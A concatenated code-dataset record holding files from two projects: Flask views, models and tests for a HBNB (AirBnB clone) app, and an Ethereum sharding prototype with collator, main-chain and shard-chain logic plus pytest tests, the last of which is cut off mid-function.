            # FileStorage fallback: collect the City objects whose
            # state_id matches this State's id.
            cities_list = []
            all_cities = models.storage.all(City).values()
            for ct in all_cities:
                if ct.state_id == self.id:
                    cities_list.append(ct)
            return cities_list
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""test for the console"""
import unittest
from console import HBNBCommand
from models.base_model import BaseModel
from models.__init__ import storage
from models.user import User
from models.place import Place
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.review import Review
class TestConsole(unittest.TestCase):
    """Unit tests for the HBNB command interpreter."""

    def test_prompt(self):
        """The interpreter prompt must read '(hbnb) '."""
        self.assertEqual(HBNBCommand.prompt, '(hbnb) ')
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""test for db storage"""
import unittest
from unittest.mock import patch
from io import StringIO
import pep8
import os
import json
import console
import tests
from console import HBNBCommand
from models.base_model import BaseModel
from models.user import User
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.place import Place
from models.review import Review
from models.engine.file_storage import FileStorage
from models.engine.db_storage import DBStorage
class TestDbStorage(unittest.TestCase):
    """this will test the db_storage"""

    def test_docstrings_in_db(self):
        """checking for docstrings"""
        # Every public DBStorage member must carry a docstring.
        members = (DBStorage, DBStorage.__init__, DBStorage.all,
                   DBStorage.new, DBStorage.save, DBStorage.delete,
                   DBStorage.reload)
        for member in members:
            self.assertIsNotNone(member.__doc__)
if __name__ == "__main__":
    # Allow running this test module directly with `python`.
    unittest.main()
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.route("/hbnb_filters", strict_slashes=False)
def states():
    """Render the hbnb filters page.

    Loads every State and Amenity object from storage and hands them to
    the 10-hbnb_filters.html template, which handles display and sorting.
    """
    all_states = storage.all("State").values()
    all_amenities = storage.all("Amenity").values()
    return render_template("10-hbnb_filters.html",
                           stateAll=all_states, amenityAll=all_amenities)
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.teardown_appcontext
def closeStorage(exception):
    """Remove the current SQLAlchemy session after each request.

    Flask invokes teardown callbacks with the unhandled exception (or
    None) as a positional argument; the parameter was misleadingly named
    `self` before.
    """
    storage.close()
@app.route("/states_list", strict_slashes=False)
def stateslist():
    """Display an HTML page listing every State object.

    Bug fix: the view previously declared a `request` parameter, but a
    Flask view whose route has no URL variables is called with no
    arguments, so every request raised TypeError (HTTP 500).
    """
    liststates = storage.all("State").values()
    return render_template('7-states_list.html', liststates=liststates)


if __name__ == "__main__":
    # Serve on all interfaces, default Flask port.
    app.run(host='0.0.0.0', port=5000)
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.teardown_appcontext
def closeStorage(exception):
    """Remove the current SQLAlchemy session after each request.

    Flask invokes teardown callbacks with the unhandled exception (or
    None) as a positional argument; the parameter was misleadingly named
    `self` before.
    """
    storage.close()
@app.route("/cities_by_states", strict_slashes=False)
def citiesbystates():
    """Display every State with its linked City objects.

    Bug fix: the view previously declared a `request` parameter, but a
    Flask view whose route has no URL variables is called with no
    arguments, so every request raised TypeError (HTTP 500).
    """
    citystate = storage.all("State").values()
    return render_template('8-cities_by_states.html', citystate=citystate)


if __name__ == "__main__":
    # Serve on all interfaces, default Flask port.
    app.run(host='0.0.0.0', port=5000)
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.teardown_appcontext
def closeStorage(exception):
    """Remove the current SQLAlchemy session after each request.

    Flask invokes teardown callbacks with the unhandled exception (or
    None) as a positional argument; the parameter was misleadingly named
    `self` before.
    """
    storage.close()
@app.route("/states", strict_slashes=False)
@app.route("/states/<id>", strict_slashes=False)
def states(id=None):
    """Display all States, or one State's detail when an id is given.

    Bug fixes:
      * The route variable is `<id>`, but the parameter was named
        `stateId`, so every /states/<id> request raised TypeError.
      * The id branch fell through without a return statement, producing
        an empty 500 response.

    The parameter shadows the builtin `id` because Flask passes the URL
    variable by that keyword name.
    """
    states = storage.all("State")
    state_key = None
    if id is not None:
        # Storage keys objects as "<ClassName>.<id>".
        state_key = "State." + id
    # NOTE(review): the template is assumed to handle both the full
    # listing and the single-state / not-found cases — confirm against
    # 9-states.html.
    return render_template('9-states.html', states=states, stateId=state_key)
@app.teardown_appcontext
def closeStorage(self):
    """Remove the current SQLAlchemy session after each request.

    NOTE(review): this duplicates the identical closeStorage defined
    above -- the second `def` rebinds the module name and registers a
    second (identical) teardown callback. Likely copy-paste leftover;
    confirm and drop one. `self` is actually the exception object (or
    None) that Flask passes to teardown callbacks.
    """
    storage.close()
if __name__ == "__main__":
    # Bind to all interfaces so the dev server is reachable externally.
    app.run(host='0.0.0.0', port=5000)
|
[
"/1-pack_web_static.py",
"/2-do_deploy_web_static01.py",
"/3-deploy_web_static.py",
"/models/__init__.py",
"/models/engine/db_storage.py",
"/models/state.py",
"/tests/test_console.py",
"/tests/test_models/test_engine/test_db_storage.py",
"/web_flask/10-hbnb_filters.py",
"/web_flask/7-states_list.py",
"/web_flask/8-cities_by_states.py",
"/web_flask/9-states.py"
] |
01admin/sharding
|
from ethereum.slogging import get_logger
from ethereum.consensus_strategy import get_consensus_strategy
from ethereum.messages import apply_transaction
from ethereum import utils
from sharding import state_transition
log = get_logger('sharding.collator')
def apply_collation(state, collation, period_start_prevblock):
    """Validate and execute `collation` on top of `state`.

    On any validation or execution failure the state is rolled back to
    its snapshot and the exception is re-raised; otherwise the mutated
    state is returned.
    """
    snap = state.snapshot()
    consensus = get_consensus_strategy(state.config)
    try:
        # Run the consensus initialize hook for this period's prev block.
        consensus.initialize(state, period_start_prevblock)
        # assert consensus.check_seal(state, period_start_prevblock.header)
        # The collation's tx-list root must check out before executing.
        assert state_transition.validate_transaction_tree(collation)
        for tx in collation.transactions:
            apply_transaction(state, tx)
        # Seal the state (state root, receipt root, ...) and compare it
        # against the roots recorded in the collation header.
        state_transition.finalize(state, collation.header.coinbase)
        assert state_transition.verify_execution_results(state, collation)
    except (ValueError, AssertionError) as err:
        state.revert(snap)
        raise err
    return state
def create_collation(
        chain,
        shardId,
        parent_collation_hash,
        expected_period_number,
        coinbase,
        key,
        txqueue=None):
    """Create and sign a collation on top of a parent collation.

    chain: MainChain
    shardId: id of ShardChain
    parent_collation_hash: the hash of the parent collation
    expected_period_number: the period number in which this collation
        expects to be included
    coinbase: coinbase
    key: key for sig
    txqueue: transaction queue (None -> no transactions added)

    Raises AssertionError when the shard is not tracked or the expected
    period has no start-prev block yet. A signing failure is logged and
    the collation is returned unsigned (best effort).
    """
    log.info('Creating a collation')
    assert chain.has_shard(shardId)
    # Rebuild the post-state of the parent collation to execute against.
    temp_state = chain.shards[shardId].mk_poststate_of_collation_hash(parent_collation_hash)
    cs = get_consensus_strategy(temp_state.config)
    # Set period_start_prevblock info
    period_start_prevhash = chain.get_period_start_prevhash(expected_period_number)
    assert period_start_prevhash is not None
    period_start_prevblock = chain.get_block(period_start_prevhash)
    # Call the initialize state transition function
    cs.initialize(temp_state, period_start_prevblock)
    # Initialize a collation with the given previous state and current coinbase
    collation = state_transition.mk_collation_from_prevstate(chain.shards[shardId], temp_state, coinbase)
    # Add transactions
    state_transition.add_transactions(temp_state, collation, txqueue)
    # Call the finalize state transition function
    state_transition.finalize(temp_state, collation.header.coinbase)
    # Set state root, receipt root, etc
    state_transition.set_execution_results(temp_state, collation)
    # Stamp the header with its position in the shard and in the period.
    collation.header.shardId = shardId
    collation.header.parent_collation_hash = parent_collation_hash
    collation.header.expected_period_number = expected_period_number
    collation.header.period_start_prevhash = period_start_prevhash
    try:
        sig = sign(collation.signing_hash, key)
        collation.header.sig = sig
    except Exception as e:
        # Best-effort signing: the unsigned collation is still returned.
        log.info('Failed to sign collation, exception: {}'.format(str(e)))
    log.info('Created collation successfully')
    return collation
def sign(msg_hash, privkey):
    """ECDSA-sign `msg_hash` with `privkey`.

    Returns the concatenation of the 32-byte big-endian encodings of
    v, r and s.
    """
    return b''.join(utils.encode_int32(component)
                    for component in utils.ecsign(msg_hash, privkey))
--- FILE SEPARATOR ---
import copy
from ethereum.config import default_config
from ethereum import utils
# Sharding chain configuration: a deep copy of pyethereum's default_config
# with all pre-Serenity forks active from genesis plus sharding-specific
# parameters. (The stale block of commented-out draft values that used to
# live here was removed; see VCS history if needed.)
sharding_config = copy.deepcopy(default_config)

sharding_config['HOMESTEAD_FORK_BLKNUM'] = 0
sharding_config['METROPOLIS_FORK_BLKNUM'] = 0
sharding_config['SERENITY_FORK_BLKNUM'] = 0
sharding_config['SHARD_COUNT'] = 100
# valmgr_addr: should be modified whenever "the v, r, s in valmgr tx" or
# "the content of the contract" change
# TODO: Should we just call the sharding.validator_manager.get_valmgr_addr()
# to determine the valmgr address here for now? Or add a check in
# test_validator_manager.py to check if
# `sharding_config['VALIDATOR_MANAGER_ADDRESS']` equals to
# `utils.checksum_encode(get_valmgr_addr())`?
# Because currently we modify the contract so frequently.
sharding_config['VALIDATOR_MANAGER_ADDRESS'] = '0x8dcD67edcEbb9C169bDb16F7c9fAc19E34d633D0'
sharding_config['USED_RECEIPT_STORE_ADDRESS'] = ''  # TODO
# NOTE: was assigned twice with the same value; duplicate removed.
sharding_config['SIG_GASLIMIT'] = 40000
sharding_config['COLLATOR_REWARD'] = 0.002 * utils.denoms.ether
sharding_config['PERIOD_LENGTH'] = 5  # blocks
sharding_config['SHUFFLING_CYCLE'] = 2500  # blocks
--- FILE SEPARATOR ---
from builtins import (bytes, str, open, super, range,
zip, round, input, int, pow, object)
import itertools
import rlp
from rlp.utils import encode_hex
from ethereum import utils
from ethereum.meta import apply_block
from ethereum.exceptions import InvalidTransaction, VerificationFailed
from ethereum.slogging import get_logger
from ethereum.pow.chain import Chain
from sharding.shard_chain import ShardChain
log = get_logger('eth.chain')
def safe_decode(x):
    """Hex-decode `x`, tolerating an optional '0x' prefix."""
    stripped = x[2:] if x[:2] == '0x' else x
    return utils.decode_hex(stripped)
class MainChain(Chain):
    """Slightly modified pow.chain for sharding.

    Extends pow.chain.Chain with a registry of tracked ShardChains and
    helpers that map collations onto main-chain blocks and periods.
    """

    def __init__(self, genesis=None, env=None,
                 new_head_cb=None, reset_genesis=False, localtime=None, **kwargs):
        super().__init__(
            genesis=genesis, env=env,
            new_head_cb=new_head_cb, reset_genesis=reset_genesis, localtime=localtime, **kwargs)
        # shardId -> ShardChain for every shard this node tracks.
        self.shards = {}
        self.shard_id_list = set()

    def init_shard(self, shardId):
        """Initialize a new ShardChain and add it to MainChain.

        Returns False if the shard is already tracked.
        """
        if not self.has_shard(shardId):
            self.shard_id_list.add(shardId)
            self.shards[shardId] = ShardChain(env=self.env, shardId=shardId)
            return True
        else:
            return False

    def add_shard(self, shard):
        """Add an existing ShardChain to MainChain.

        Returns False if the shard is already tracked.
        """
        if not self.has_shard(shard.shardId):
            self.shards[shard.shardId] = shard
            self.shard_id_list.add(shard.shardId)
            return True
        else:
            return False

    def has_shard(self, shardId):
        """Check if the validator is tracking this shard."""
        return shardId in self.shard_id_list

    # Call upon receiving a block, reorganize the collation head
    # TODO: Override add_block
    def add_block(self, block):
        """Validate and persist `block`, updating head and indices.

        Returns True when the block was stored; False when it was
        deferred (timestamp in the future / unknown parent) or rejected
        as invalid.
        """
        now = self.localtime
        # Are we receiving the block too early?
        if block.header.timestamp > now:
            i = 0
            while i < len(self.time_queue) and block.timestamp > self.time_queue[i].timestamp:
                i += 1
            self.time_queue.insert(i, block)
            log.info('Block received too early (%d vs %d). Delaying for %d seconds' %
                     (now, block.header.timestamp, block.header.timestamp - now))
            return False
        # Is the block being added to the head?
        if block.header.prevhash == self.head_hash:
            log.info('Adding to head', head=encode_hex(block.header.prevhash))
            try:
                apply_block(self.state, block)
            except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
                log.info('Block %d (%s) with parent %s invalid, reason: %s' %
                         (block.number, encode_hex(block.header.hash), encode_hex(block.header.prevhash), e))
                return False
            self.db.put(b'block:%d' % block.header.number, block.header.hash)
            block_score = self.get_score(block)  # side effect: put 'score:' cache in db
            self.head_hash = block.header.hash
            for i, tx in enumerate(block.transactions):
                self.db.put(b'txindex:' + tx.hash, rlp.encode([block.number, i]))
            assert self.get_blockhash_by_number(block.header.number) == block.header.hash
        # Or is the block being added to a chain that is not currently the head?
        elif block.header.prevhash in self.env.db:
            log.info('Receiving block not on head, adding to secondary post state',
                     prevhash=encode_hex(block.header.prevhash))
            temp_state = self.mk_poststate_of_blockhash(block.header.prevhash)
            try:
                apply_block(temp_state, block)
            except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
                log.info('Block %s with parent %s invalid, reason: %s' %
                         (encode_hex(block.header.hash), encode_hex(block.header.prevhash), e))
                return False
            block_score = self.get_score(block)
            # If the block should be the new head, replace the head
            if block_score > self.get_score(self.head):
                b = block
                new_chain = {}
                # Find common ancestor
                while b.header.number >= int(self.db.get('GENESIS_NUMBER')):
                    new_chain[b.header.number] = b
                    key = b'block:%d' % b.header.number
                    orig_at_height = self.db.get(key) if key in self.db else None
                    if orig_at_height == b.header.hash:
                        break
                    if b.prevhash not in self.db or self.db.get(b.prevhash) == 'GENESIS':
                        break
                    b = self.get_parent(b)
                # Replace block index and tx indices
                replace_from = b.header.number
                for i in itertools.count(replace_from):
                    log.info('Rewriting height %d' % i)
                    key = b'block:%d' % i
                    orig_at_height = self.db.get(key) if key in self.db else None
                    if orig_at_height:
                        self.db.delete(key)
                        orig_block_at_height = self.get_block(orig_at_height)
                        for tx in orig_block_at_height.transactions:
                            if b'txindex:' + tx.hash in self.db:
                                self.db.delete(b'txindex:' + tx.hash)
                    if i in new_chain:
                        new_block_at_height = new_chain[i]
                        self.db.put(key, new_block_at_height.header.hash)
                        # NOTE: the inner enumerate rebinds `i`; harmless
                        # because itertools.count drives the outer loop.
                        for i, tx in enumerate(new_block_at_height.transactions):
                            self.db.put(b'txindex:' + tx.hash,
                                        rlp.encode([new_block_at_height.number, i]))
                    if i not in new_chain and not orig_at_height:
                        break
                self.head_hash = block.header.hash
                self.state = temp_state
        # Block has no parent yet
        else:
            if block.header.prevhash not in self.parent_queue:
                self.parent_queue[block.header.prevhash] = []
            self.parent_queue[block.header.prevhash].append(block)
            log.info('No parent found. Delaying for now')
            return False
        self.add_child(block)
        self.db.put('head_hash', self.head_hash)
        self.db.put(block.header.hash, rlp.encode(block))
        self.db.commit()
        log.info(
            'Added block %d (%s) with %d txs and %d gas' %
            (block.header.number, encode_hex(block.header.hash)[:8], len(block.transactions), block.header.gas_used))
        if self.new_head_cb and block.header.number != 0:
            self.new_head_cb(block)
        # Replay any children that arrived before this block.
        if block.header.hash in self.parent_queue:
            for _blk in self.parent_queue[block.header.hash]:
                self.add_block(_blk)
            del self.parent_queue[block.header.hash]
        return True

    def get_expected_period_number(self):
        """Get default expected period number to be the period number of
        the next block (current head + 1).
        """
        return (self.state.block_number + 1) // self.env.config['PERIOD_LENGTH']

    def get_period_start_prevhash(self, expected_period_number):
        """Get period_start_prevhash by expected_period_number.

        Returns None (after logging) when that block is not mined yet.
        """
        block_number = self.env.config['PERIOD_LENGTH'] * expected_period_number - 1
        period_start_prevhash = self.get_blockhash_by_number(block_number)
        if period_start_prevhash is None:
            log.info('No such block number %d' % block_number)
        return period_start_prevhash

    # TODO: test
    def update_head_collation_of_block(self, collation):
        """Update ShardChain.head_collation_of_block.

        Walks the blocks that include `collation` (and, on promotion,
        their children), promoting the collation to head collation
        wherever it outscores the current one.

        NOTE(review): this destructively pops
        collation_blockhash_lists[collhash] while traversing, and the
        traversal scope below was reconstructed from whitespace-mangled
        source -- confirm children are only enqueued on promotion.
        """
        shardId = collation.header.shardId
        collhash = collation.header.hash
        # Get the blockhash list of blocks that include the given collation
        if collhash in self.shards[shardId].collation_blockhash_lists:
            blockhash_list = self.shards[shardId].collation_blockhash_lists[collhash]
            while blockhash_list:
                blockhash = blockhash_list.pop(0)
                given_collation_score = self.shards[shardId].get_score(collation)
                head_collation_score = self.shards[shardId].get_score(self.shards[shardId].get_head_collation(blockhash))
                if given_collation_score > head_collation_score:
                    self.shards[shardId].head_collation_of_block[blockhash] = collhash
                    block = self.get_block(blockhash)
                    blockhash_list.extend(self.get_children(block))
        return True

    # TODO: test
    def reorganize_head_collation(self, block, collation):
        """Reorganize head collation.

        block: head block
        collation: given collation

        NOTE(review): head_collation_of_block stores a collation *hash*,
        yet it is passed to self.get_score (the Chain block scorer) --
        confirm this is intended; it looks like it should go through
        the shard's get_collation/get_score instead.
        """
        blockhash = block.header.hash
        collhash = collation.header.hash
        shardId = collation.header.shardId
        head_coll_in_prevhash = False
        # Update collation_blockhash_lists
        if self.has_shard(shardId) and self.shards[shardId].db.get(collhash) is not None:
            self.shards[shardId].collation_blockhash_lists[collhash].append(blockhash)
        else:
            head_coll_in_prevhash = True
        # Compare scores
        given_collation_score = self.shards[shardId].get_score(collation)
        head_collation_score = self.get_score(self.shards[shardId].head_collation_of_block[blockhash])
        if given_collation_score > head_collation_score:
            self.shards[shardId].head_collation_of_block[blockhash] = collhash
        else:
            head_coll_in_prevhash = True
        if head_coll_in_prevhash:
            # Fall back to the head collation recorded for the parent block.
            self.shards[shardId].head_collation_of_block[blockhash] = self.shards[shardId].head_collation_of_block[block.header.prevhash]
        self.shards[shardId].head_hash = self.shards[shardId].head_collation_of_block[blockhash]

    def handle_orphan_collation(self, collation):
        """Handle the orphan collation (previously ignored collation).

        collation: the parent collation

        NOTE(review): uses `collation.shardId` (not .header.shardId) and
        replays children with the *parent's* period_start_prevhash --
        confirm both against Collation's attribute proxying and the
        intended period of the queued children.
        """
        if collation.header.hash in self.shards[collation.shardId].parent_queue:
            for _collation in self.shards[collation.shardId].parent_queue[collation.header.hash]:
                _period_start_prevblock = self.get_block(collation.header.period_start_prevhash)
                self.shards[collation.shardId].add_collation(_collation, _period_start_prevblock, self.handle_orphan_collation)
            del self.shards[collation.shardId].parent_queue[collation.header.hash]
        self.update_head_collation_of_block(collation)
--- FILE SEPARATOR ---
import time
import json
import logging
from collections import defaultdict
import rlp
from rlp.utils import encode_hex
from ethereum import utils
from ethereum.exceptions import InvalidTransaction, VerificationFailed
from ethereum.slogging import get_logger
from ethereum.config import Env
from ethereum.state import State
from ethereum.pow.consensus import initialize
from sharding.collation import CollationHeader, Collation
from sharding.collator import apply_collation
from sharding.state_transition import update_collation_env_variables
log = get_logger('sharding.shard_chain')
log.setLevel(logging.DEBUG)
def safe_decode(x):
    """Hex-decode `x`, accepting an optional '0x' prefix."""
    prefix, remainder = x[:2], x[2:]
    return utils.decode_hex(remainder if prefix == '0x' else x)
def initialize_genesis_keys(state, genesis):
    """Rewrite ethereum.genesis_helpers.initialize_genesis_keys.

    Seeds the db with genesis bookkeeping entries (hash, state snapshot,
    rlp, score, state root) for the given genesis collation.

    NOTE(review): GENESIS_NUMBER is deliberately left unwritten here even
    though MainChain.add_block reads it -- confirm shard chains never hit
    that code path.
    """
    db = state.db
    # db.put('GENESIS_NUMBER', str(genesis.header.number))
    db.put('GENESIS_HASH', str(genesis.header.hash))
    db.put('GENESIS_STATE', json.dumps(state.to_snapshot()))
    db.put('GENESIS_RLP', rlp.encode(genesis))
    # Genesis starts the score chain at "0".
    db.put(b'score:' + genesis.header.hash, "0")
    db.put(b'state:' + genesis.header.hash, state.trie.root_hash)
    db.put(genesis.header.hash, 'GENESIS')
    db.commit()
class ShardChain(object):
    """Chain of collations for a single shard.

    Mirrors pow.chain.Chain's structure but stores Collation objects
    keyed by collation hash, plus two fork-choice maps:
    collation_blockhash_lists (M1) and head_collation_of_block (M2).
    """

    def __init__(self, shardId, env=None,
                 new_head_cb=None, reset_genesis=False, localtime=None,
                 initial_state=None, **kwargs):
        """Load the saved head from db when present, else start empty.

        initial_state: optional pre-built State (testing only; requires
        env to be None so the state's own env is adopted).
        """
        self.env = env or Env()
        self.shardId = shardId
        self.collation_blockhash_lists = defaultdict(list)  # M1: collation_header_hash -> list[block_hash]
        self.head_collation_of_block = {}  # M2: block_hash -> head_collation
        # Initialize the state
        head_hash_key = 'shard_' + str(shardId) + '_head_hash'
        if head_hash_key in self.db:  # new head tag
            self.state = self.mk_poststate_of_collation_hash(self.db.get(head_hash_key))
            log.info(
                'Initializing shard chain from saved head, #%d (%s)' %
                (self.state.prev_headers[0].number, encode_hex(self.state.prev_headers[0].hash)))
            self.head_hash = self.state.prev_headers[0].hash
        else:
            # no head_hash in db -> empty shard chain
            if initial_state is not None and isinstance(initial_state, State):
                # Normally, initial_state is for testing
                assert env is None
                self.state = initial_state
                self.env = self.state.env
                log.info('Initializing chain from provided state')
            else:
                self.state = State(env=self.env)
            self.head_hash = self.env.config['GENESIS_PREVHASH']
            self.db.put(self.head_hash, 'GENESIS')
            self.db.put(head_hash_key, self.head_hash)
            # initial score
            key = b'score:' + self.head_hash
            self.db.put(key, str(0))
            self.db.commit()
            reset_genesis = True
        assert self.env.db == self.state.db
        initialize(self.state)
        self.new_head_cb = new_head_cb
        if reset_genesis:
            initialize_genesis_keys(self.state, Collation(CollationHeader()))
        self.time_queue = []
        # parent_collation_hash -> [collations waiting on that parent]
        self.parent_queue = {}
        self.localtime = time.time() if localtime is None else localtime

    @property
    def db(self):
        # Shared key-value store from the environment.
        return self.env.db

    # TODO: use head_collation_of_block to update head collation
    @property
    def head(self):
        """Head collation object, or None when it cannot be loaded."""
        try:
            collation_rlp = self.db.get(self.head_hash)
            # [TODO] no genesis collation
            if collation_rlp == 'GENESIS':
                return Collation(CollationHeader())
                # return self.genesis
            else:
                return rlp.decode(collation_rlp, Collation)
            # NOTE(review): unreachable -- both branches above return.
            return rlp.decode(collation_rlp, Collation)
        except Exception as e:
            # NOTE(review): broad catch; any db/decode failure yields None.
            log.info(str(e))
            print(str(e))
            return None

    def add_collation(self, collation, period_start_prevblock, handle_orphan_collation):
        """Add collation to db and update score.

        handle_orphan_collation: callback (MainChain.handle_orphan_collation)
        used to replay queued children once this collation lands.
        Returns True on success; False when the collation is invalid,
        orphaned, or the orphan callback fails.
        """
        if collation.header.parent_collation_hash in self.env.db:
            log.info(
                'Receiving collation(%s) which its parent is in db: %s' %
                (encode_hex(collation.header.hash), encode_hex(collation.header.parent_collation_hash)))
            if self.is_first_collation(collation):
                log.debug('It is the first collation of shard {}'.format(self.shardId))
                temp_state = self.state.ephemeral_clone()
            else:
                temp_state = self.mk_poststate_of_collation_hash(collation.header.parent_collation_hash)
            try:
                apply_collation(temp_state, collation, period_start_prevblock)
            except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
                log.info('Collation %s with parent %s invalid, reason: %s' %
                         (encode_hex(collation.header.hash), encode_hex(collation.header.parent_collation_hash), str(e)))
                return False
            # Side effect: fills the 'score:' cache for this collation.
            collation_score = self.get_score(collation)
            log.info('collation_score of {} is {}'.format(encode_hex(collation.header.hash), collation_score))
        # Collation has no parent yet
        else:
            log.info(
                'Receiving collation(%s) which its parent is NOT in db: %s' %
                (encode_hex(collation.header.hash), encode_hex(collation.header.parent_collation_hash)))
            if collation.header.parent_collation_hash not in self.parent_queue:
                self.parent_queue[collation.header.parent_collation_hash] = []
            self.parent_queue[collation.header.parent_collation_hash].append(collation)
            log.info('No parent found. Delaying for now')
            return False
        self.db.put(collation.header.hash, rlp.encode(collation))
        # TODO: Delete old junk data
        # deletes, changed
        self.db.commit()
        log.info(
            'Added collation (%s) with %d txs' %
            (encode_hex(collation.header.hash)[:8],
             len(collation.transactions)))
        # Call optional callback
        if self.new_head_cb and self.is_first_collation(collation):
            self.new_head_cb(collation)
        # TODO: It seems weird to use callback function to access member of MainChain
        try:
            handle_orphan_collation(collation)
        except Exception as e:
            log.info('handle_orphan_collation exception: {}'.format(str(e)))
            return False
        return True

    def mk_poststate_of_collation_hash(self, collation_hash):
        """Return the post-state of the collation.

        Raises Exception for an unknown hash; the GENESIS marker resolves
        to the snapshotted genesis state.
        """
        if collation_hash not in self.db:
            raise Exception("Collation hash %s not found" % encode_hex(collation_hash))
        collation_rlp = self.db.get(collation_hash)
        if collation_rlp == 'GENESIS':
            return State.from_snapshot(json.loads(self.db.get('GENESIS_STATE')), self.env)
        collation = rlp.decode(collation_rlp, Collation)
        state = State(env=self.env)
        state.trie.root_hash = collation.header.post_state_root
        update_collation_env_variables(state, collation)
        # Reset per-collation execution bookkeeping.
        state.gas_used = 0
        state.txindex = len(collation.transactions)
        state.recent_uncles = {}
        state.prev_headers = []
        assert len(state.journal) == 0, state.journal
        return state

    def get_parent(self, collation):
        """Get the parent collation of a given collation (None for the first)."""
        if self.is_first_collation(collation):
            return None
        return self.get_collation(collation.header.parent_collation_hash)

    def get_collation(self, collation_hash):
        """Get the collation with a given collation hash, or None on failure."""
        try:
            collation_rlp = self.db.get(collation_hash)
            if collation_rlp == 'GENESIS':
                return Collation(CollationHeader())
                # if not hasattr(self, 'genesis'):
                #     self.genesis = rlp.decode(self.db.get('GENESIS_RLP'), sedes=Block)
                # return self.genesis
            else:
                return rlp.decode(collation_rlp, Collation)
        except Exception as e:
            log.debug("Failed to get collation", hash=encode_hex(collation_hash), error=str(e))
            return None

    def get_score(self, collation):
        """Get the score (chain length from genesis) of a given collation.

        Walks up uncached ancestors, then back-fills the 'score:' cache
        for each (side effect: db writes).
        """
        score = 0
        if not collation:
            return 0
        key = b'score:' + collation.header.hash
        fills = []
        while key not in self.db and collation is not None:
            fills.insert(0, collation.header.hash)
            key = b'score:' + collation.header.parent_collation_hash
            collation = self.get_parent(collation)
        score = int(self.db.get(key))
        log.debug('int(self.db.get(key)):{}'.format(int(self.db.get(key))))
        for h in fills:
            key = b'score:' + h
            score += 1
            self.db.put(key, str(score))
        return score

    def is_first_collation(self, collation):
        """Check if the given collation is the first collation of this shard."""
        return collation.header.parent_collation_hash == self.env.config['GENESIS_PREVHASH']

    # TODO: test
    def get_head_collation(self, blockhash):
        """Get the head collation recorded for `blockhash`, or None."""
        collation = None
        if blockhash in self.head_collation_of_block:
            collhash = self.head_collation_of_block[blockhash]
        else:
            log.info('head_collation_of_block[%s] is not found' % encode_hex(blockhash))
            return None
        try:
            collation = self.get_collation(collhash)
        except KeyError as e:
            log.info(
                'Collation (%s) with blockhash %s invalid, reason: %s' %
                (encode_hex(collhash), encode_hex(blockhash), str(e)))
            return None
        return collation
--- FILE SEPARATOR ---
import pytest
from ethereum.transaction_queue import TransactionQueue
from ethereum import utils
from ethereum import trie
from sharding import collator
from sharding.tools import tester
def chain(shardId):
    """Build a tester.Chain tracking shard `shardId` with 5 mined blocks.

    This is a plain helper, not a pytest fixture: the tests below call
    it directly with an argument, and calling a @pytest.fixture-decorated
    function directly raises an error in modern pytest.
    """
    t = tester.Chain(env='sharding')
    t.add_test_shard(shardId)
    t.mine(5)
    return t
def test_create_collation_empty_txqueue():
    """create_collation on an empty TransactionQueue yields a tx-free collation."""
    shard_id = 1
    tc = chain(shard_id)
    parent_hash = tc.chain.shards[shard_id].head_hash
    period_number = tc.chain.get_expected_period_number()
    empty_queue = TransactionQueue()
    collation = collator.create_collation(
        tc.chain,
        shard_id,
        parent_hash,
        period_number,
        coinbase=tester.a1,
        key=tester.k1,
        txqueue=empty_queue)
    assert collation.transaction_count == 0
    assert collation.header.coinbase == tester.a1
def test_create_collation_with_txs():
    """create_collation picks up the transactions queued for it."""
    shard_id = 1
    tc = chain(shard_id)
    parent_hash = tc.chain.shards[shard_id].head_hash
    period_number = tc.chain.get_expected_period_number()
    queue = TransactionQueue()
    queue.add_transaction(
        tc.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether)))
    queue.add_transaction(
        tc.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether)))
    collation = collator.create_collation(
        tc.chain,
        shard_id,
        parent_hash,
        period_number,
        coinbase=tester.a1,
        key=tester.k1,
        txqueue=queue)
    assert collation.transaction_count == 2
def test_apply_collation():
    """apply_collation advances the shard state to the collation's post state."""
    shard_id = 1
    tc = chain(shard_id)
    queue = TransactionQueue()
    queue.add_transaction(
        tc.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether)))
    queue.add_transaction(
        tc.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether)))
    state = tc.chain.shards[shard_id].state
    root_before = state.trie.root_hash
    collation = tc.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=queue)
    prevblock = tc.chain.get_block(collation.header.period_start_prevhash)
    collator.apply_collation(state, collation, prevblock)
    assert state.trie.root_hash != root_before
    assert collation.header.post_state_root == state.trie.root_hash
    assert collation.header.post_state_root == tc.chain.shards[shard_id].state.trie.root_hash
def test_apply_collation_wrong_root():
    """Test apply_collation with wrong roots in header.

    test verify_execution_results: corrupts post_state_root,
    receipts_root and tx_list_root in turn; each must raise ValueError.
    """
    shardId = 1
    t = chain(shardId)
    # test 1 - arrange
    state = t.chain.shards[shardId].state
    txqueue = TransactionQueue()
    tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
    txqueue.add_transaction(tx1)
    # post_state_root
    collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
    period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
    # Set wrong root
    collation.header.post_state_root = trie.BLANK_ROOT
    with pytest.raises(ValueError):
        collator.apply_collation(state, collation, period_start_prevblock)
    # test 2 - arrange
    state = t.chain.shards[shardId].state
    txqueue = TransactionQueue()
